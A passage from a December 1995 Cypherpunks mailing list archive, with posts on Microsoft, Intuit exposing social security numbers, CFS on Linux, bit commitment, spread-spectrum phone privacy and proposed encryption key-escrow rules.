longer necessary at all.' His remarks about media coverage were similar to recent statements by Deutch and his predecessors, R. James Woolsey and Robert M. Gates." KGB_cia (5 cia) From robl at on-ramp.ior.com Thu Dec 21 08:52:59 1995 From: robl at on-ramp.ior.com (RobL) Date: Thu, 21 Dec 95 08:52:59 PST Subject: Microsoft Flame[tm] [NOISE] Message-ID: At 06:32 AM 12/21/95 CST, Roy M. Silvernail wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >There's a lot of finger waving going on over Microsoft's alleged >predatory practices. I just want to remind the pro-MS folks of >something. Microsoft has a documented track record of using >undocumented entry points in their OS and Windows products. These entry >points allow MS apps to do some things more efficiently than a [snip] > >While this isn't the grand-scale conspiracy some people seem to see, >IMHO it's still predatory. Perhaps the call to separate the OS and apps >divisions is a good idea. It would be interesting to see if Microsoft >could maintain its edge in applications when it had no sub rosa >advantage in OS access. IMHO, I see nothing wrong with predatory behavior.. then again, I hunt in the fall, so it must be a redneck thing.. MS and any of the other software companies are competing for domination in a narrow field.. MS just happens to be the only real choice for OS anymore.. well, for a standard, out of the box OS anyways. The fact that they have to leave in undisclosed hooks to get their own software to excell over others just points to the poor software they produce overall. I have to admit that I like, possibly admire, the way the Bill and crew have captured the market.. from a marketing standpoint, they did a first rate job of running with the ball until there was no pursuit.. Sure, from time to time, someone tries to throw a blocker in thier path, but they just overrun it and keep going.. Forget about the monopoly aspects for a second and look at MS as an American success story. It has all the classic elements: started small, with a crew of social misfits and eventually grew up. Just a few cents worth.. RobL ------------------|----------------------------------------------------------- Rob Lowry | PO Box 288 | Rockford Wa 99030 | ral at otc.mhs.compuserve.com robl at on-ramp.ior.com From jcobb at ahcbsd1.ovnet.com Thu Dec 21 08:54:31 1995 From: jcobb at ahcbsd1.ovnet.com (James M. Cobb) Date: Thu, 21 Dec 95 08:54:31 PST Subject: Political Cleanup program Message-ID: Friend, On 12 17 95 jimbell at pacifier.com proposed ...a system...that would "blind" campaign donations as to their source: The donor could be satisfied that his dona- tion gets to the candidate or cause, but the candidate could- n't know who actually paid the money (and the donor would be unable to prove that he made a donation...). Let's analyse: A gives B what B wants (money) so that B will give A what A wants (whatever). A knows B got the money. A can't prove he gave the money to B. B knows he got the money. B can't be sure that A gave the money. So, depending on time, place, and circumstance; and assum- ing B's elected: B will not give A what A wants OR B will give A what A wants For instance, if... A gives the money but dies before B gets elected. A gives the money but gets sent to the Balkans. A is a nobody. ...B will not give A what A wants. For instance, if... A gives the money but B's already in debt to him, and the baloon payment's due. A gives the money and A's appointed head of an office where B's relatives "work." A is the main man in town. ...B will give A what A wants. Some things are known by some people whether they're entered on the books or not. I agree with the proposer that his system ...would change politics as we know it. Flexible corruption is best. Cordially, Jim From perry at piermont.com Thu Dec 21 09:05:23 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 21 Dec 95 09:05:23 PST Subject: just a reminder... Message-ID: <199512211705.MAA01270@jekyll.piermont.com> This isn't anti-trust punks... ...or microsoft punks... ...its cypherpunks... ...Just a reminder. .pm From nobody at REPLAY.COM Thu Dec 21 09:06:58 1995 From: nobody at REPLAY.COM (Anonymous) Date: Thu, 21 Dec 95 09:06:58 PST Subject: FWD: Intuit and SSNs Message-ID: <199512211706.SAA10738@utopia.hacktic.nl> What does our man in Intuit have to say about this? > Date: 18 Dec 1995 19:10:07 -0800 > From: michael at piglet.amscons.com (Michael Bryan) > Subject: SSN Shown On Payments by Intuit's Banking Service > Organization: none > > Another user (Robert Mayo) discovered, and I confirmed, that Intuit's > online bill payment service sends your payees a printout containing > your social security number. > > This applies to any person who is using Quicken for Windows or > Microsoft Money for Windows to send payment requests electronically, > using Intuit's service. It specifically does -not- apply to using > Quicken with the Checkfree service, as the Checkfree service does not > supply anybody with your SSN. > > The details: > > When the Intuit service sends a payment to a merchant, it will do one > of three things. First, it will try to perform an EFT directly from > your account into the merchant's. Most merchant's are still not setup > for this, however. Second, if your payment is the only payment going > to a given merchant on a given day, then they will print a check, drawn > against your account, and mail it to the merchant. Both of these > methods are ok, and do not result in your merchant receiving your SSN. > > However, if there are multiple payments going to a single merchant on a > given day (i.e., more than one customer has requested a payment to the > given merchang), all of these payments are sent in a single envelope, > and a summary sheet is enclosed. This summary sheet will have a field > called "Control Number", which consists of your SSN, followed by two > other digits. This summary also lists your checking account number, in > addition to your name, account with the merchant, and the amount of > your payment. (In my opinion, only these last three fields are called > for. There is no need for the checking account number to be listed, > even though it -is- printed on your check as part of the MICR > encoding.) > > I have contacted Intuit regarding this matter, and they have been > decidedly less than helpful. I know at least three other people who > have called them, and we have all been told the same thing: > > 1) "Most of your merchants already have your SSN". Perhaps this is > true for some people, but it is not the case with me. > > 2) "The SSN is encrypted on the printout". Absolutely not true. It is > printed under the label "Control Number", and has two extra digits > appended, but this does not "encrypt" the number. Anybody who knows > what the field contains has instant knowledge of your SSN. > > Intuit is currently refusing to address this issue. Furthormore, when > I called in, they tried to tell me I was the only person who was > complaining. I immediately gave them the names of three other people > who had called in, one of whom I knew had talked to this particular > individual. So that little "divide-and-conquer" trick backfired. > > Also, when I said that I would be forced to go to the media if they > didn't address this issue, I was told that by doing so, I would be > responsible for broadcasting this information to those who might then > illegally use the information. I found this two-faced attitude > particularly annoying. On the one hand, they are claiming it's not a > problem, yet on the other they tried to keep me from going to the media > because it might give criminals information they could then exploit. > > Anyway, I've done all I can with talking to Intuit, so I am now > pursuing other avenues. My bank (Union Bank) was particularly > concerned that the SSN was being printed out and mailed with > potentially every payment, and vowed to look into it and work with > Intuit on my behalf to get this behaviour stopped. Also, I and a few > others have contacted various media representatives, in an attempt to > get them to focus a spotlight on Intuit, and let people know that > Intuit is broadcasting their SSN, without their knowledge. And of > course, I'm posting Usenet articles in the privacy newsgroups, as well > as the newsgroup where most Quicken discussion occurs, > comp.os.ms-windows.apps.financial. > > If you are using Intuit's Online Bill Payment service, and are > concerned about this, please call Intuit and express your displeasure. > The number for the Online Bill Payment service is 708-585-8500. Also, > call your bank, and inform them as to what's going on. Finally, write > to your local (or national) newspaper, let them know about this, and > ask them to cover this in their paper. > > It appears that the only way Intuit is going to address this is by > getting some negative publicity, since customer complaints don't seem > to carry enough weight. I wish they were more reasonable, but that > just doesn't seem to be happening here. So be it --- they want a > fight, they've got one. From sameer at c2.org Thu Dec 21 09:10:01 1995 From: sameer at c2.org (sameer) Date: Thu, 21 Dec 95 09:10:01 PST Subject: FTC Privacy Initiative (fwd) In-Reply-To: <9512210144.AA04101@pulm1.accessone.com> Message-ID: <199512211704.JAA12536@infinity.c2.org> > > "Hey, we can't just stand around here with nothing to do. > Give us something to regulate - anything, pro or con; we > must regulate something." Gah. Just what we need, a law to do what technology can do better. Sometime early next year community connexion will be running an anonymizing web proxy, located on high bandwidth pipes to major interchange points. Stay tuned. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From m5 at dev.tivoli.com Thu Dec 21 09:15:04 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Thu, 21 Dec 95 09:15:04 PST Subject: Encryption Rules Coming In-Reply-To: <199512211605.LAA00150@pipe3.nyc.pipeline.com> Message-ID: <9512211714.AA08868@alpha> > Financial Times, December 21, 1995, p. 4. > > However, many governments, including that of the US, have > resisted permitting the technology to be exported because > they fear it will fall into the hands of organised crime > and terrorist organisations. I am forced to wonder whether the people who type in stories like this are conscious while they do so. Replace "the technology" with "pistols" in the above paragraph; it doesn't make any sense unless you assume there are no organized crime or terrorist organizations in the US, or that such organizations can only acquire things that pass through national borders. Are news editors so technophobic that they assume there must be something they just "don't get"? On a vaguely related note, I saw a quick preview for an episode of "The Client". The episode was supposed to be about Internet child molesters (who I suppose are the ones that know the secret "meta-alt-ctrl" sequence that causes the innocent victims on the other end of the wire to be abused via modem). Anybody see it? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From janzen at idacom.hp.com Thu Dec 21 10:08:05 1995 From: janzen at idacom.hp.com (Martin Janzen) Date: Thu, 21 Dec 95 10:08:05 PST Subject: CFS and Linux In-Reply-To: <199512210440.XAA28196@crypto.com> Message-ID: <9512211806.AA23346@sabel.idacom.hp.com> -----BEGIN PGP SIGNED MESSAGE----- Matt Blaze writes: > [...] > I'm not sure exactly what problem you're having, but the most common > CFS-Linux problem that people complain about has to do with the rpcgen > output not being in the format expected by the rest of CFS. There > seem to be two things you can do about this: get a version of rpcgen > that generates the "standard" (original Sun) names for the functions it > generates, or just grab the rpcgen output from the cfs-users mailing list > archive ("echo help | mail cfs-users-request at research att.com" for details). You can get the original Sun ONC RPC 4.0 code, including rpcgen, from: ftp://bcm.tmc.edu/nfs/rpc_40.* It also used to be at: ftp://wuarchive.wustl.edu/systems/sun/sun-exchange/rpc4.0 but this server is so busy that I can't verify this URL right now. > NB to "Bill Gates" and friends: To save you the trouble of pointing it out, > I hereby admit that I'm a commie-fascist brainwashed sold out member of the > military-industrial complex who has been programmed by his masters to > infiltrate the cypherpunks in order to sap and impurify their precious > bodily fluids. You left out the part about helping to cover up the UFO abductions... - -- Martin Janzen janzen at idacom.hp.com Pegasus Systems Group c/o Hewlett-Packard, IDACOM Telecom Operation -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNmh+G3Fsi8cupgZAQFQ6AP/dHlQpig999yDQ8fY3yD3w9ZcKVTGCweU M96oqf5aDltwRp9pMMRp5+5DsajRQoRdtMPhyDWMogkE7/zmMK8RGJlcJ0Z4j0Yi 3brRblzCwIjjSnwTrlPeoccmdrlLiUhisVn7iZknwGzJdmLFutR3TzW+ht08YKHq 6m9MBhQ8MTw= =pYLf -----END PGP SIGNATURE----- From tcmay at got.net Thu Dec 21 10:17:55 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 21 Dec 95 10:17:55 PST Subject: The War on Some Money [long] Message-ID: Amidst all the flames about impure Cypherpunks on the list, about evil capitalist corporations, about conspiracies involving the underground Grey Alien bases in Nevada, and amidst the flames about posts not dealing solely with number theory or ciphers, it's nice to read a post like this one from David Murray. The tension between "private transactions" and "traceable transactions" is indeed at the core of the debate. Kudos to David on this. I just want to end on a positive note before leaving for the holidays (the birthday of my savior, F. Hayek, of course). --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From hfinney at shell.portal.com Thu Dec 21 10:29:06 1995 From: hfinney at shell.portal.com (Hal) Date: Thu, 21 Dec 95 10:29:06 PST Subject: Bit Commitment Query Message-ID: <199512211827.KAA16701@jobe.shell.portal.com> For Robbie Gates, I agree that the bit commitment he describes seems more complicated than necessary. The simpler one, where you just hash (R,b), is the one I have seen used. I suggest asking on sci.crypt. Bruce Schneier and many other good cryptographers read that group. For Futplex, the idea of using a block encryption algorithm in a similar way, encrypting (R,b) with a secret key K, and later revealing K, is a little questionable because block encryption algorithms are not designed to avoid collisions in the same way hashes are. Futplex suggests that it should be hard to find two keys K_1 and K_2 such that E_K_1(R, b1) = E_K_2(R, b2) where b1<>b2. But this is not necessarily true. A cryptosystem might have the property, say, that complementing the key is equivalent to complementing bit 0 of the plaintext. DES has some simple complementation properties (although not this one). Unless you can show that a cipher with this property is inherently weak then it is not a valid assumption that a cipher won't have this property. There is some literature on creating hash functions out of block ciphers. The two are really not interchangeable. Hal From jimbell at pacifier.com Thu Dec 21 10:52:58 1995 From: jimbell at pacifier.com (jim bell) Date: Thu, 21 Dec 95 10:52:58 PST Subject: Microsoft Flame[tm] [NOISE] Message-ID: Forget about the monopoly aspects for a second and look >at MS as an American success story. It has all the classic elements: started >small, with a crew of social misfits and eventually grew up. >RobL >------------------|----------------------------------------------------------- >Rob Lowry | >PO Box 288 | >Rockford Wa 99030 | ral at otc.mhs.compuserve.com robl at on-ramp.ior.com Well, I disagree. Microsoft succeeded primarily because it was "chosen" by IBM in about 1981 or so, needing an OS for their PC. MS didn't even write it; Seattle Computer did, and that was a port of CP/M. Not much creativity. MSDOS revisions 1.0 and 1.1 were pure crap. From anonymous-remailer at shell.portal.com Thu Dec 21 11:25:50 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 21 Dec 95 11:25:50 PST Subject: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE?? Message-ID: <199512211924.LAA21493@jobe.shell.portal.com> Alice here ... Back on Tue, 19 Dec 1995, I wrote: >>>Can anyone tell me whether Ian Goldberg and David Wagner got their >>>$25,000 from Netscape for finding the HUGE security flaws in Netscape's >>>existing product line?? >>> >> >I can't remember whether they got anything or not ... >> >> That would be no (well, except for the nifty T-shirt from Sameer; Thanks!). > > Not anything?? That's shameful ... where on earth are the values in > America, today? Everyone should ask this question. AT&T can sign-on to a two-page ad, calling on Congress to balance the budget -- to cut off veterans, and cut-off women with dependent children just before Christmas. It can sign on to this, but it can't bother to even offer a scholarship to the students who helped make its fortunes. It would rather leave the impression that it freeloads off of other's efforts. It's shameful. > AT&T and Netscape have jointly made a small fortune distributing this > product, and yet NEITHER company feels that the software engineers who > "voluntarily" made a difference -- a couple of students -- deserve > even a wooden nickel for the ideas which were used. > > It's absolutely shameful. But then, I guess that AT&T and Netscape > have no shame at all. > > They just steal "intellectual property" from students, and don't even > pay a token amount. > > And people wonder what's wrong with America? Luckily for those of us who don't live in the United States, we can perhaps look at that country and truly wonder what is going on over there, and what is wrong with America? Where are the values amongst ALL Americans, not just Netscape and AT&T? What are the role models that all the leaders -- business, sports, and political leaders -- show to the national youth. Here is all I've seen (as a foreigner), over the last while: Enid Greene Waldholtz blubbering in a news conference about how she as a congress person certainly COULDN'T be expected to resign after winning her election with stolen money. Blubbering for five hours straight (except when she had to stop to turn a page, I mean) ... She certainly said that "leadership" is all about playing "victim". Poor little Enid. (And even worse, she was _defended_ by Susan Molinari.) Bob Dole, deciding to go to Bosnia. The former WW II veteran willingly jeopardizing the lives of American boys -- boys who have put their lives on the line in a _volunteer_ armed force -- all for a lousy political photo-op. The chance to say ... "hey look at me, I'm here in Bosnia." Someone who's willing to overrule the Pentagon's own most diplomatic advice on how complex an operation this actually is. And then there is AT&T. A company who's Chairman can publish a letter which calls on Congress to cut off checks to mothers with dependent children and war veterans days before Christmas, all while stealing and freeloading off of the work of some students. Scrooge ... take heart. Here's Holiday wish #1. Enid do the right thing ... resign. Say the "right thing" and say that your child -- the future and the delayed gratification that the future brings -- is much more important than your own personal PRESENT political aspirations. Here's Holiday wish #2. Bob, lots of people worked their asses off to make sure that the American fighter pilot, and the two French fighter pilots could be rescued from Bosnia. If you want to go and get some photo-ops, go to Germany or Italy, and give one hell of a vote of support to the boys that are there -- a support which could just as easily have been given and should be given in Congress. A _real_ strong unfettered commitment. And here's Holiday wish #3. AT&T. Do the right thing. Reward those people who help make you a fortune. Stand tall as an example, rather than as an embarrassment to the nation. You've ignored this for so long now, that you've almost dug your own grave. But you still have a chance to save face. Have the courage to take the chance when it's offered. Simply say that the proposal to reward David Wagner and Ian Goldberg -- some holiday mad money and scholarships -- was lost in committee, and approval processes -- but it WAS in the works, and it was recommended and can now be announced just before Christmas, as a rightful reward. Some holiday cheer. Will people think it's a cynical attempt at manipulation? Yep. But it's a darned site better than the alternatives -- especially when you look at possible future outcomes. Trust me, this is far better than calling for veterans and single mothers with children to be cut-off just before the holidays. Perhaps, Enid, Bob, and AT&T will all learn when to use offense and when to use defense. They might also learn that the best offense is a good defense. They might even begin to look at what "courage" truly is, and of how difficult it can be for anyone to do the "right thing", especially when they think that they're surrounded by minefields. Even when the "right thing" is in your own best interest, you not only have to be shown the right path to take, but you have to have the motivation and courage to make the move and take action. Enid, Bob, and AT&T, take note. Hopefully for the holidays, everyone finds the courage to neutralize some portion of the vulnerability spectrum they've placed themselves in. > > - Ian "There's a reason people talk about `starving grad students'..." > > Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From tcmay at got.net Thu Dec 21 11:26:44 1995 From: tcmay at got.net (Timothy C. May) Date: Thu, 21 Dec 95 11:26:44 PST Subject: Cypherpunks resumes? Message-ID: At 7:55 AM 12/21/95, Anonymous wrote: >Is there any chance of seeing a Cypherpunks 'Rogues Gallery' of sorts >in the archives anytime soon? It would be nice to see a face connected >to the postings here. Some of us don't get the chance of getting out >west for the parties, The only other thing I know about Tim May besides >being one of the Fathers of the Cypherpunks is that he was a naked hippie >in a hot tub at some party that Robert Hettinga was at some weeks ago, > >That doesn't paint a good picture for me. - But, "Anonymous," we don't even know which of the many "Anonymous" ones you are, so why should we go out of our way to provide images, resumes, dossiers, etc., to you? In any case, many of the folks on this list have elected to have Web pages, often with images of themselves, their SOs, their pets, their computers, and so on. Perhaps their images will paint a better picture for you. (I note that the last "Anonymous" person concerned with getting the "real" pictures of people was S. Boxx, or maybe Pablo Escobar, I forget.) (I have not spent time generating a "home page." I see the burgeoning shelves of "HTML Bible" self-help books and see more and more people spending time gussying-up their home pages. People are even putting their personal diaries on the Web, plus all sorts of personal stuff that is finding its way into compiled dossiers. Not for me. I prefer my essays to be what goes into my dossiers.) Or, as our esteemed Gothamite might reJoyce: Erudite, profligate, disputacious -- indistinguishable from many other publicity-saving levitationisms. 'Tis superficially an expurgated part of the Ruby Ridge-slippered Great Oz divulgation. Ostentatiously, the preterite few surf the gilt-edged waves while Jose Sixpacks languish in spider-webbed Quayle-spelt ghettoes populated by home page homeys. For further emendations and emissions, behave normally and reply with a blank message labelled: XMAS_troll --You Know Who From alano at teleport.com Thu Dec 21 11:36:41 1995 From: alano at teleport.com (Alan Olsen) Date: Thu, 21 Dec 95 11:36:41 PST Subject: CFS and Linux Message-ID: <2.2b7.32.19951221193732.008cb5b4@mail.teleport.com> At 11:40 PM 12/20/95 -0500, Matt Blaze wrote: >I'm told that all version of CFS since 1.0.4 (the latest is 1.3.1) >do work out-of-the-box under *some* releases of Linux and with some >coaxing on the others. I am wondering if he is compiling for ELF. That seems to throw a good size monkey wrench into just about every piece of software out there. (At least the ones that have not been written to take the ELF paculiarities into account.) >I'm not sure exactly what problem you're having, but the most common >CFS-Linux problem that people complain about has to do with the rpcgen >output not being in the format expected by the rest of CFS. There >seem to be two things you can do about this: get a version of rpcgen >that generates the "standard" (original Sun) names for the functions it >generates, or just grab the rpcgen output from the cfs-users mailing list >archive ("echo help | mail cfs-users-request at research att.com" for details). I think you may be right on this one. I have heard of a few other things having problems with Linux's version of rpcgen. (The names of which are not coming to mind... Need more coffee.) [rest of reply deleted because I had nothing to say about it] ObNoise: >NB to "Bill Gates" and friends: To save you the trouble of pointing it out, >I hereby admit that I'm a commie-fascist brainwashed sold out member of the >military-industrial complex who has been programmed by his masters to >infiltrate the cypherpunks in order to sap and impurify their precious >bodily fluids. I think that the mention of Mr. Bill as a "good guy" is the most effective use of agent provoceteur-type behaviour I have seen on this list yet. We know who Mat and Jeff work for. Who do the anon-flamers work for? | Remember: Life is not always champagne. Sometimes it is REAL pain. | |"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.teleport.com/~alano/ | alano at teleport.com | From frantz at netcom.com Thu Dec 21 12:01:29 1995 From: frantz at netcom.com (Bill Frantz) Date: Thu, 21 Dec 95 12:01:29 PST Subject: No Subject Message-ID: <199512211958.LAA27482@netcom17.netcom.com> David Plotnikoff, in his regular (WWW oriented) column in the San Jose Mercury News, writes: DOES YOUR BOSS KNOW WHERE YOU'RE SURFING? The SIMBA Media daily reported recently that a Maryland-based software publisher called Charles River Media has introrduced a $30 electronic fink program called "Internet Watchdog" that keeps an eye on where you've been hanging out on the Net. the program doesn't block or censor sites, but it does maintain a handy record of cyber-footprints that the parent, teacher or employer who controls your Net access can peruse. ----[end]---- Anyone know more about this program? ----------------------------------------------------------------- Bill Frantz Periwinkle -- Computer Consulting (408)356-8506 16345 Englewood Ave. frantz at netcom.com Los Gatos, CA 95032, USA From andr0id at midwest.net Thu Dec 21 12:25:30 1995 From: andr0id at midwest.net (Jason Rentz) Date: Thu, 21 Dec 95 12:25:30 PST Subject: 900mhz digital phones - how much to trust ? Message-ID: <199512212046.OAA18997@cdale1.midwest.net> > >Whats the current thinking on the security level of 900Mhz digital spread >sectrum cordless phones? Clearly it's not a basic scanner job but how much >more equipment is needed to monitor one ? Well when you listen into a spread spectrum conversation what you will hear is open squelch white noise. The spread spectrum radios that I know about send information on several deffrent frequencies throughout the conversation. Unless you have a system to receive the encoding bit that signal what frequency is next you can't easily find the next freqency before it changes again. This change happens several time a second. The information is "packet-like", that is why you are able to use so many spread spectrum units at once. Example, Lynx spread spectrum T1 information signal (data) is combined with a high rate spreading code (chip sequence). A multiplier performs the combination. Because the spreading code is pseudo-randomly generated, the combined signal occupies a significantly expanded bandwidth with a lower uniform power density. At the receiver, a locally generated, synchronized replica of the spreading code recovers the information signal, through a second multiplication. The same code sequence must be used in the transmitter and receiver to avoic losing the information. The coding is direct sequence, 16 x spreading rate, the number of codes is a 9 DIP switch selectable. Intresting is taht the radio acquisition time is 500 msec, typical. If this a security hole I don't know. Note this is typical of a Spread Spectrum Microwave radio, a lot of the same applies to 900MHz T1 and cordless phones. As soon as I have further info on encryption of signal/Freq. destination I'll post it. Dr0id ( Computer Consulting & Management ) (P.O. Box 421 Cambria, IL 62915-0421) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1 dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63 NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA= =SgPT -----END PGP PUBLIC KEY BLOCK----- From andr0id at midwest.net Thu Dec 21 12:25:51 1995 From: andr0id at midwest.net (Jason Rentz) Date: Thu, 21 Dec 95 12:25:51 PST Subject: ex encrypted script Message-ID: <199512212047.OAA19022@cdale1.midwest.net> ] > >| Is there a way to encrypt a script yet still allow it to be runnable? I >| know that the simple answer is to write it in C and compile it but I don't >| have the means of doing that at the moment. (i.e. there is not compiler on >| the system) >| >| I thought of a few simple protections but they all involve decrypting before >| running. > > Ever hear of chmod? chown? >Adam The vendor also has superuser access.. chmod chown won't protect it.. :( ( Computer Consulting & Management ) (P.O. Box 421 Cambria, IL 62915-0421) -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzCsIi4AAAEH/1hb5+tO/n99Nbppf0ImLJ6AaVZ3NlZP0ZHwRQor00uA129i d4zWixNXxc8t2auaqN+asV99LpIip3/nQzBnjydiumeBdGLF2PR9+6X8X/RrqKa1 dVIukxM5Agg2eM6ih+0J38hgKJ3qzKXSz6sjYmpaxvbXZoHHOLUk/ZtHUKvvEyPw hnJEYnut8NUnIeK56lqeqRw86yoeRKymbfCdjdpgeY2aRwK2FJts8sbb7Fs10s4y jgxWIxIipBznbGUTh1hb2XrLGPENwk3E/qqXQJEsrySbtwdl6VgTVQjhDDEJMitL DYeiQ3W5EgxfcdbM1j2FwYu3P/dM6Y0I8xLMYT0ABRG0NmFuZHIwaWRAb2ljdTgx Mi5jb20gKG9pY3U4MTIuY29tIHN5c3RlbSBhZG1pbmlzdHJhdG9yKYkBFQMFEDCs LO90C7R/GkJcSQEB01cH/0KC3sd+u4OxMku5378SJktoN6QIQYLJ7uVbuV4S51yK NAotCGf4Wl6wwjynzZvXKU0H87oDuMiq7FybgMNL2n+4bQIZi0iz0lIuzwoMDu63 NrHUW9Kz42pOnhrEhrdkHhHL9O5GgD1yc40fJ3qw5h7LQEjDxgypyw0IFILFc34u LeRLliNibxKp8JwAxXNHWSgxu28TQvmnkHi0AHP6tJ/uZYe+4dqJtrMMsYFjzZaz DPmxD+dzbTwlQKtJaP1ZkDI0Sr072wrZDv+G86GyGBMX2lpSafpRitnxuUttjU9o wsQ9Qo5xiH1nZRCs/bDzJe/gng+GHzevixDIITurtNA= =SgPT -----END PGP PUBLIC KEY BLOCK----- From steven at echonyc.com Thu Dec 21 13:43:08 1995 From: steven at echonyc.com (Steven Levy) Date: Thu, 21 Dec 95 13:43:08 PST Subject: KOD In-Reply-To: Message-ID: Oh come on, be a sport. On Wed, 20 Dec 1995, David Mandl wrote: > On Wed, 20 Dec 1995, John Young wrote: > > > Congratulations to the cypherpunks named Newsweek's "Big > > Thinkers of tomorrow -- the list of 50 People Who Matter Most > > on the Internet." In the December 25 issue. > > Can you reveal who they are? No way am I going to buy Newsweek to > find out. > > --Dave. > > -- > David Mandl > Bear, Stearns & Co. Inc. > Phone: (212) 272-3888 > Email: dmandl at bear.com > > -- > ******************************************************************************* > Bear Stearns is not responsible for any recommendation, solicitation, offer or > agreement or any information about any transaction, customer account or account > activity contained in this communication. > ******************************************************************************* > From paul.elliott at hrnowl.lonestar.org Thu Dec 21 14:08:38 1995 From: paul.elliott at hrnowl.lonestar.org (Paul Elliott) Date: Thu, 21 Dec 95 14:08:38 PST Subject: GAK boycott, What are legal implications? Message-ID: <30d9ca78.flight@flight.hrnowl.lonestar.org> -----BEGIN PGP SIGNED MESSAGE----- Here is a question for all of you cyber legal types out there. This question presupposes: The NIST will complete its work on the GAK standard. But no law will be passed (yet) regulating the use of encryption in the U. S. (The GAK standard is an attempt to create an environment in which such laws can be passed.) In the U.S., Big Company INC will start marketing a GAKed encryption product domesticly. A bunch of cypherpunkish types will immediately try to organize a boycott against BIG COMPANY. What are the cypherpunks legal risks? I seem to remember that back in the 70s, the NAACP lost a big case with respect to their boycott in a southern city. As I recall there were people in the street begging money for the NAACP because there was a > 10**6 $ judgement against the NAACP and they needed that much just to appeal. - -- Paul Elliott Telephone: 1-713-781-4543 Paul.Elliott at hrnowl.lonestar.org Address: 3987 South Gessner #224 Houston Texas 77063 -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNnJ8/BUQYbUhJh5AQGbsgP/T0n31SqeuHt+7AbizymcEhu/78DUuym5 sj+MO3ruA9WcEBQUXfabuf/PgOwlrtUAcC3dISPvXwGbdygc9oHBfxSglLi48g7d dvDS4wziRHF7N8sBsYn0ee9YyKhPd9U7Ci0ovOc5frFGSZ2Bt4hU703d7bR+6cB+ iHHqsPaAa6o= =EPoj -----END PGP SIGNATURE----- From ses at tipper.oit.unc.edu Thu Dec 21 14:09:52 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Thu, 21 Dec 95 14:09:52 PST Subject: FTC Privacy Initiative (fwd) In-Reply-To: Message-ID: FWIW, Sunsite has always had a policy of following the guidelines of the American Library Association on both collections policy and use of access records. The ALA rules are pretty cool, and have the great advantage of being easily understood by administrators (it also means that you can rely on the library community as an ally in the event of challenges.) Joe-Bob says check them out Simon From futplex at pseudonym.com Thu Dec 21 15:07:32 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 21 Dec 95 15:07:32 PST Subject: Encryption Rules Coming In-Reply-To: <199512211605.LAA00150@pipe3.nyc.pipeline.com> Message-ID: <199512212307.SAA14030@thor.cs.umass.edu> > Financial Times, December 21, 1995, p. 4. > > Encryption rules to be prepared > > By Andrew Jack in Paris > > Representatives of international business and government > yesterday agreed to draw up guidelines on encryption, [...] > The meeting, which was held at the International Chamber of > Commerce in Paris, could lead to formal propositions > prepared jointly by business and government organisations > that could be ready by as soon as next summer. [...] > However, many governments [...] > have demanded that they should be able to "hack" into > computer transmissions for counter-intelligence and > criminal investigation work, in the same way that they can > conduct telephone-tapping exercises. > > An important conclusion of yesterday's Paris meeting was > that business agreed in principle to allow such hacking to > take place as long as sufficient safeguards were in place > and "electronic search warrants" had been issued with > proper judicial approval. [...] The Int'l. Chamber of Commerce turns out to have Web pages. Their latest press release on the web came out last week, describing the upcoming conference: Business and governments seek agreed policy on encryption of electronic messages A few excerpts: "OECD governments are participating in the two day conference, together with representatives 